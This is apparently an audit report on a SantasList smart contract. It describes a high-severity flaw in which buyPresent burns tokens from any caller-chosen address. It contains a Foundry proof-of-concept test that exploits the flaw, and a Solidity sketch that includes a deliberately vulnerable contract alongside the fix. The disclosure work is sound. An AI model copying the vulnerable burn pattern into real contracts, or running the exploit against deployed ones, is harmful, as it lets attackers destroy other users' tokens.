Submission Details
Severity: high
Valid

Anyone can buy a present by passing an address that holds SantaTokens as input

Summary

The vulnerability lies in the SantasList.buyPresent function, which burns SantaTokens from the presentReceiver address given as a parameter rather than from the caller. An attacker can therefore burn tokens belonging to another user and have a present minted for themselves. This results in an unauthorized transfer of value, corrupts user balances and compromises the integrity of the contract's present purchase mechanism.

Vulnerability Details

In the vulnerable buyPresent function, the caller chooses the address whose tokens pay for the present. An attacker can pass the address of an EXTRA_NICE user who holds SantaTokens and call buyPresent from an unrelated account. The tokens are burned from the unsuspecting user without any approval, and a present is minted for the attacker. As a consequence, the attacker can spend other users' tokens at will, leaving user balances misaligned and defeating the intended functionality of the contract.

Impact

The identified vulnerability has a significant impact on the contract's functionality and security. By exploiting the flaw in the buyPresent function, an attacker can burn tokens from any address passed as presentReceiver, without that address's consent, and obtain presents paid for with someone else's tokens.

POC

In the test file, add this state variable:

    address receiver = makeAddr("receiver");

Then add this function to test the exploit:

    function testAttackBuyPresent() public {
        // santa marks the user EXTRA_NICE on both lists
        vm.startPrank(santa);
        santasList.checkList(user, SantasList.Status.EXTRA_NICE);
        santasList.checkTwice(user, SantasList.Status.EXTRA_NICE);
        vm.stopPrank();
        vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);
        // the extra nice user collects their present and receives SantaTokens
        vm.startPrank(user);
        santasList.collectPresent();
        vm.stopPrank();
        // an unrelated account buys a present, passing the extra nice user's address
        vm.startPrank(receiver);
        santasList.buyPresent(user);
        vm.stopPrank();
        // the user's tokens were burned and the caller received a present
        assertEq(santasList.balanceOf(user), 1);
        assertEq(santaToken.balanceOf(user), 0);
        assertEq(santasList.balanceOf(receiver), 1);
    }

Run this command to test only this function and observe the exploit:

    forge t --mt testAttackBuyPresent -vvvvv

Tools Used

Foundry & Manual Review

Recommendations

In buyPresent, the address passed to i_santaToken's burn function should be changed from presentReceiver to msg.sender, so that tokens are burned from whoever calls the function rather than from an arbitrary address chosen by the caller.
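To make the flaw and the fix concrete, the following is an added illustrative sketch and not the project's code. It pairs a minimal token whose burn performs no allowance check (as the judge's note describes) with two versions of buyPresent: the vulnerable one burns from the caller-supplied presentReceiver, the hardened one burns from msg.sender as recommended above. The PRESENT_COST constant, the rewardExtraNice stand-in for the project's collectPresent reward, and the presents mapping are assumptions made so the file compiles on its own; the present still goes to the caller, as the PoC's assertions show.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustrative reconstruction, not the audited project's code.
// PRESENT_COST, rewardExtraNice and the presents mapping are assumptions.

/// Minimal token: only the list contract may mint or burn, and burn takes an
/// arbitrary `from` with no allowance check, so the list decides who pays.
contract SantaTokenSketch {
    mapping(address => uint256) public balanceOf;
    address public immutable list;

    constructor(address list_) {
        list = list_;
    }

    function mint(address to, uint256 amount) external {
        require(msg.sender == list, "only list");
        balanceOf[to] += amount;
    }

    /// Debits `from` without any approval: safety depends entirely on the
    /// list contract passing the right address.
    function burn(address from, uint256 amount) external {
        require(msg.sender == list, "only list");
        require(balanceOf[from] >= amount, "insufficient");
        balanceOf[from] -= amount;
    }
}

/// Shared scaffolding for both versions of the list.
abstract contract PresentListBase {
    uint256 public constant PRESENT_COST = 1e18; // assumed price of a present
    SantaTokenSketch public immutable i_santaToken;
    address public immutable santa;
    mapping(address => uint256) public presents; // presents held per address

    constructor() {
        santa = msg.sender;
        i_santaToken = new SantaTokenSketch(address(this));
    }

    /// Stand-in for the reward an EXTRA_NICE user gets when collecting.
    function rewardExtraNice(address to) external {
        require(msg.sender == santa, "only santa");
        i_santaToken.mint(to, PRESENT_COST);
    }

    function _mintPresent(address to) internal {
        presents[to] += 1;
    }
}

/// Vulnerable form: the caller names whose tokens are burned.
contract VulnerableList is PresentListBase {
    function buyPresent(address presentReceiver) external {
        // BUG: any address with a balance can be drained by any caller
        i_santaToken.burn(presentReceiver, PRESENT_COST);
        _mintPresent(msg.sender);
    }
}

/// Hardened form: the caller pays for the present they buy.
contract FixedList is PresentListBase {
    function buyPresent(address /* presentReceiver */) external {
        // FIX: burn from msg.sender, so a caller with no tokens reverts
        i_santaToken.burn(msg.sender, PRESENT_COST);
        _mintPresent(msg.sender);
    }
}
```

Against VulnerableList, the PoC sequence above succeeds: santa calls rewardExtraNice(user), an unrelated account calls buyPresent(user), user's balance drops to zero and the caller's presents count becomes 1. Against FixedList the same call reverts with "insufficient", because the caller holds no tokens.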

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

buyPresent should use msg.sender

Current implementation allows a malicious actor to burn someone else's tokens, as the burn function doesn't actually check for approvals.
